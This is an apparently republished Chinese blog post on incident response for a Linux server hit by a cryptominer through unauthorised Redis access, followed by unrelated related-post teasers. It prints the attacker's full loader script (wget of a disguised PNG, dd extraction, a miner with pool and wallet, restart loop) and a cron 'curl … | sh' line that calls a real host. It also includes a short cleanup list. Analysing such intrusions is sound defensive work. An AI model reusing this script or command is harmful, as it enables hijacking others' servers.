linux挖矿病毒工具,Linux服务器挖矿病毒

linux挖矿病毒工具,Linux服务器挖矿病毒攻击者通过Redis未授权访问,写入定时任务,执行挖矿程序。排查过程检查进程发现SSH后门[root@testservertmp]#psaux|grep2345|grep-vgreproot135870.00.0666241144?SsMar220:00/tmp/su-oPort=2345[root@testservertmp]#lsof-p135…

大家好,又见面了,我是你们的朋友全栈君。

攻击者通过Redis未授权访问,写入定时任务,执行挖矿程序。

排查过程

检查进程发现SSH后门

[root@testserver tmp]# ps aux | grep 2345 | grep -v grep

root 13587 0.0 0.0 66624 1144 ? Ss Mar22 0:00 /tmp/su -oPort=2345

[root@testserver tmp]# lsof -p 13587

COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME

su 13587 root cwd DIR 202,2 4096 2 /

su 13587 root rtd DIR 202,2 4096 2 /

su 13587 root txt REG 202,2 546680 1718717 /usr/sbin/sshd

发现异常进程

root 1800 57064 0 00:46 ? 00:00:00 CROND

root 1801 1800 0 00:46 ? 00:00:00 /bin/sh -c curl -fsSL http://104.156.239.160:8080/conn.sh | sh

root 1803 1801 0 00:46 ? 00:00:03 sh

PS中看到很多定时任务进程CROND,crontab -l发现又是redis写进来的,那么再看下/root/.ssh/authorized_keys,果然也写了免登陆。

2712f039057ccb97c114e5670e73ab21.png

发现攻击者使用的脚本http://104.156.239.160:8080/conn.sh

脚本内容如下:

#!/bin/sh

ps -fe|grep conns |grep -v grep

if [ $? -ne 0 ]

then

echo “start process…..”

wget https://ooo.0o0.ooo/2017/01/15/587b626883fdc.png -O /tmp/conn

dd if=/tmp/conn skip=7664 bs=1 of=/tmp/conns

chmod +x /tmp/conns

nohup /tmp/conns -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 44xdB6UmabC8R69V6jDj7q1zGyDzJ7ks5GJpLs3b2HpqWwWq2xbvLKiRjmX8e9oy7426goZG9kXRTgHj9SZPGzfiQYtbTw1 -p x >/dev/null 2>&1 &

else

echo “runing…..”

fi

sleepTime=20

while [ 0 -lt 1 ]

do

ps -fe| grep conns | grep -v grep

if [ $? -ne 0 ]

then

echo “process not exists ,restart process now… “

wget https://ooo.0o0.ooo/2017/01/15/587b626883fdc.png -O /tmp/conn

dd if=/tmp/conn skip=7664 bs=1 of=/tmp/conns

chmod +x /tmp/conns

nohup /tmp/conns -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 44xdB6UmabC8R69V6jDj7q1zGyDzJ7ks5GJpLs3b2HpqWwWq2xbvLKiRjmX8e9oy7426goZG9kXRTgHj9SZPGzfiQYtbTw1 -p x >/dev/null 2>&1 &

echo “restart done ….. “

else

echo “process exists , sleep $sleepTime seconds “

fi

sleep $sleepTime

done

[root@server120 tmp]# file /tmp/conn

/tmp/conn: PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced

首先下载了一个图片,然后通过dd提取出来挖矿程序。

[root@server120 tmp]# file /tmp/conns

/tmp/conns: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped

然后每20S检查一下进程是否存活。

这种通过Redis未授权拿服务器挖矿的情况很常见。

处理过程

1)redis增加认证,清空/var/spool/cron/root和authorized_keys。

2)删除后门

3)Kill异常进程

4)重启

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/131889.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • 协方差的意义

    协方差的意义

  • ie9的兼容视图设置_ie9兼容性视图设置找不到

    ie9的兼容视图设置_ie9兼容性视图设置找不到ie9比ie8又向W3C标准靠近了一步,可能会导致原有的网页显示变乱;如果出现这种情况,选择ie9兼容性视图,网页显示就会正常。ie9分别有,为当前网页设置兼容性和为所有网站设置兼容性视图两种,下面分别说明:一、为当前网页设置兼容性视图1、快捷步骤:按alt键——工具——兼容性视图(V);或者按alt键——工具——按F12——浏览器模式(B):IE9——Internet…

  • jQuery validationEngine自定义提醒

    jQuery validationEngine自定义提醒在网上看了好多自定义验证样式,好多都是不是自己想要的!打开源码,看了一下挺简单的!将下面的样式添加到页面上就可以实现黑色主题的提醒!想要什么样式基本都可以自己修改了!很方便/*验证样式*/.formError.formErrorContent{ width:100%; /*错误提示框颜色*/ background:#000; position:rela

  • webview长按复制_安卓手机怎么复制图片上的文字

    webview长按复制_安卓手机怎么复制图片上的文字有这么一个需求,用户在浏览文本信息时希望长按信息就能弹出复制的选项方便保存或者在别的页面使用这些信息。类似的,就像长按WebView或者EditText的内容就自动弹出复制选项。这里面主要是2个特点:1、用户只能浏览文本信息而不能编辑这些文本信息;2、用户对着文本信息长时间点按可以弹出”复制”选项实现复制;网上有好多种方法可实现,也比较零散,此处做个小结,希望有所帮助。1、通过继承EditTe…

  • 搭建JavaWeb服务器[通俗易懂]

    搭建JavaWeb服务器[通俗易懂]JDK安装可以参考 http://www.cnblogs.com/a2211009/p/4265225.htmlTomcat安装可参考1.由于服务器配置比较低综合考虑,选择ubuntu系

  • efax365免费网络传真群发软件 v2.43 绿色版

    efax365免费网络传真群发软件 v2.43 绿色版2019独角兽企业重金招聘Python工程师标准>>>…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号